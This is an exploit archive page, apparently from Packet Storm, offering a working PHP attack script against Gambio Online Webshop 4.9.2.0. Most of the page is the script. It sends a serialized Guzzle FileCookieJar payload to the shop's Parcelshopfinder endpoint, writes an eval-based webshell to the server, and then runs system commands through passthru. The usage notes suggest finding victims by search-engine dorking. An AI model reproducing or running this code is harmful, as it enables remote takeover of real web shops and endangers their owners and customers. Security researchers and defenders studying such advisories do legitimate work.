exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Gambio Online Webshop 4.9.2.0 Code Injection

Gambio Online Webshop 4.9.2.0 Code Injection
Posted Oct 7, 2024
Authored by indoushka

Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.

tags | exploit, php
SHA-256 | c8f9e04f80ca5f409461edae51290f96dd6f04c7856de1b8c387b3a5757ea858

Gambio Online Webshop 4.9.2.0 Code Injection

Change Mirror Download
=============================================================================================================================================
| # Title : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.gambio.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 85 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php
class GambioExploit {
private $targetUrl;
private $webshellName;
private $postParam;
private $getParam;
private $phpCmdFunction;

public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) {
$this->targetUrl = $targetUrl;
$this->phpCmdFunction = $phpCmdFunction;
$this->webshellName = $webshellName ?: $this->randomString() . '.php';
$this->postParam = $this->randomString();
$this->getParam = $this->randomString();
}

// Random string generator
private function randomString($length = 8) {
return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);
}

// Function to send HTTP POST request
private function sendPostRequest($uri, $data) {
$url = $this->targetUrl . $uri;
$options = [
'http' => [
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}

// Upload webshell to target
public function uploadWebshell() {
$phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";

$finalPayload = base64_encode(serialize([
"GuzzleHttp\\Cookie\\FileCookieJar" => [
"cookies" => [
"GuzzleHttp\\Cookie\\SetCookie" => [
"data" => [
"Value" => $phpPayload,
"Domain" => "target.com",
"Path" => "/",
]
]
],
"filename" => $this->webshellName
]
]));

$this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [
'checkout_started' => 0,
'search' => $finalPayload,
'firstname' => 'test',
'lastname' => 'test',
]);

echo "Webshell uploaded to: {$this->webshellName}\n";
}

// Execute PHP payload
public function executePhp($cmd) {
$payload = base64_encode($cmd);
$this->sendPostRequest("/{$this->webshellName}", [
$this->postParam => $payload
]);
echo "Executed command via webshell: {$cmd}\n";
}

// Execute command
public function executeCommand($cmd) {
$payload = base64_encode($cmd);
$this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [
$this->postParam => $payload
]);
echo "Executed command: {$cmd}\n";
}
}

// Example Usage
$exploit = new GambioExploit('https://target.com');
$exploit->uploadWebshell();
$exploit->executeCommand('id');



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close